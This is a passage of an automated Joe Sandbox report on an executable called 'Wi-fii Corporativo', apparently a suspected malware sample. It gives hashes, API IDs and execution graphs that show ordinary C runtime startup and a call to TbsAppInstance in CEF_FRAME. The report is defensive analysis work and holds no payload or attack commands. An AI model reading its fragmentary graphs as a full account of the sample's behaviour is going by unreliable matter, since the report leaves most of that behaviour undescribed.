                                                • Source File: 00000007.00000002.2700223334.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000007.00000002.2700183277.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000007.00000002.2700277175.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000007.00000002.2700327054.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_510000_Wi-fii Corporativo.jbxd
                                                Similarity
                                                • API ID: Instance
                                                • String ID:
                                                • API String ID: 3141981064-0
                                                • Opcode ID: e4cb8390c80817c44343f0a0c667f5cbf6c72e888e8af97218ef0d57c203706c
                                                • Instruction ID: 7fe39b754508df76a4aa3fee068677da9c00e60860b3969ea25f42768b1bf6df
                                                • Opcode Fuzzy Hash: e4cb8390c80817c44343f0a0c667f5cbf6c72e888e8af97218ef0d57c203706c
                                                • Instruction Fuzzy Hash: D6B092342000008F8300CB30C44C60AB6E2BB9C302B00CA60A006CA265DF208854EA41

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 61 51188b-511896 SetUnhandledExceptionFilter
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00001897,005110D4), ref: 00511890
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2700223334.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000007.00000002.2700183277.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000007.00000002.2700277175.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000007.00000002.2700327054.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_510000_Wi-fii Corporativo.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: c9bffe4e408d38a2a9d42256cb83b98fa45e105b85a2021562167af41aa91d88
                                                • Instruction ID: aca40198948179b4f2d719b120b2b1173e257ba4c50e6638b4c9053b42e4dd72
                                                • Opcode Fuzzy Hash: c9bffe4e408d38a2a9d42256cb83b98fa45e105b85a2021562167af41aa91d88
                                                • Instruction Fuzzy Hash:

                                                Execution Graph

                                                Execution Coverage:5.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:95
                                                Total number of Limit Nodes:3
                                                execution_graph 307 5110e1 308 5110ed ___scrt_is_nonwritable_in_current_image 307->308 329 5113ef 308->329 310 5110f4 312 51111d 310->312 337 5116f6 IsProcessorFeaturePresent 310->337 313 511121 _initterm_e 312->313 318 51116a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 312->318 314 51114d _initterm 313->314 315 51113c ___scrt_is_nonwritable_in_current_image 313->315 314->318 316 5111bd 333 511811 memset GetStartupInfoW 316->333 318->316 320 5111b5 _register_thread_local_exe_atexit_callback 318->320 320->316 325 5111e2 exit 326 5111e8 325->326 327 5111f1 ___scrt_uninitialize_crt 326->327 328 5111ec _cexit 326->328 327->315 328->327 330 5113f8 329->330 343 5119be IsProcessorFeaturePresent 330->343 332 511404 pre_c_initialization 332->310 334 5111c2 _get_wide_winmain_command_line 333->334 335 511000 TbsAppInstance 334->335 336 511006 335->336 341 511847 GetModuleHandleW 336->341 338 511711 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 337->338 339 51170c 337->339 340 5117fe 338->340 339->338 340->310 342 5111de 341->342 342->325 342->326 344 5119e4 343->344 344->332 362 511023 _set_app_type 385 51167e 362->385 364 511030 _set_fmode __p__commode 365 511042 pre_c_initialization 364->365 386 511428 365->386 367 5110bf 368 5116f6 ___scrt_fastfail 6 API calls 367->368 369 5110c6 ___scrt_initialize_default_local_stdio_options 368->369 370 51104b __RTC_Initialize 370->367 395 5115c9 370->395 372 511064 pre_c_initialization 373 511069 _configure_wide_argv 372->373 373->367 374 511075 373->374 398 511684 InitializeSListHead 374->398 376 51107a pre_c_initialization 377 511083 __setusermatherr 376->377 378 51108e pre_c_initialization 376->378 377->378 399 511693 _controlfp_s 378->399 380 51109d pre_c_initialization 381 5110a2 _configthreadlocale 380->381 382 5110ae pre_c_initialization 381->382 383 5110b2 _initialize_wide_environment 382->383 384 5110b7 pre_c_initialization 382->384 383->384 385->364 387 511436 386->387 391 51143b ___scrt_release_startup_lock 386->391 388 5114b7 387->388 387->391 389 5116f6 ___scrt_fastfail 6 API calls 388->389 390 5114be 389->390 392 511448 _initialize_onexit_table 391->392 393 511457 391->393 392->393 394 51145b _initialize_onexit_table 392->394 393->370 394->393 404 51158e 395->404 398->376 400 5116ab 399->400 401 5116ac 399->401 400->380 402 5116f6 ___scrt_fastfail 6 API calls 401->402 403 5116b3 402->403 403->380 405 5115b2 _register_onexit_function 404->405 406 5115ab _crt_atexit 404->406 407 5115bd 405->407 406->407 407->372 345 511897 346 5118cc 345->346 347 5118a7 345->347 347->346 348 5118d2 terminate 347->348 408 511206 _seh_filter_exe 409 511249 412 5115de 409->412 411 51124e 411->411 413 511601 412->413 414 51160e GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 412->414 413->414 415 511605 413->415 414->415 415->411 349 51127b IsProcessorFeaturePresent 350 51128f 349->350 353 511253 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 350->353 352 511372 353->352 354 51199b _except_handler4_common 355 51121a 356 511847 GetModuleHandleW 355->356 357 511222 356->357 358 511226 _exit 357->358 359 51122e 357->359 358->359 360 511234 _c_exit 359->360 361 511239 ___scrt_is_nonwritable_in_current_image 359->361 360->361 416 5110cf 420 51188b SetUnhandledExceptionFilter 416->420 418 5110d4 pre_c_initialization 419 5110d9 _set_new_mode 418->419 420->418

                                                Callgraph

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 511000 TbsAppInstance 1 511006-51100f 0->1
                                                APIs
                                                • TbsAppInstance.CEF_FRAME(005111D7,00510000,00000000,00000000,?,00000007,005124E8,00000014), ref: 00511000
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3684809855.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000008.00000002.3684742552.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000008.00000002.3684850513.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000008.00000002.3684890919.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_510000_Wi-fii Corporativo.jbxd
                                                Similarity
                                                • API ID: Instance
                                                • String ID:
                                                • API String ID: 3141981064-0
                                                • Opcode ID: e4cb8390c80817c44343f0a0c667f5cbf6c72e888e8af97218ef0d57c203706c
                                                • Instruction ID: 7fe39b754508df76a4aa3fee068677da9c00e60860b3969ea25f42768b1bf6df
                                                • Opcode Fuzzy Hash: e4cb8390c80817c44343f0a0c667f5cbf6c72e888e8af97218ef0d57c203706c
                                                • Instruction Fuzzy Hash: D6B092342000008F8300CB30C44C60AB6E2BB9C302B00CA60A006CA265DF208854EA41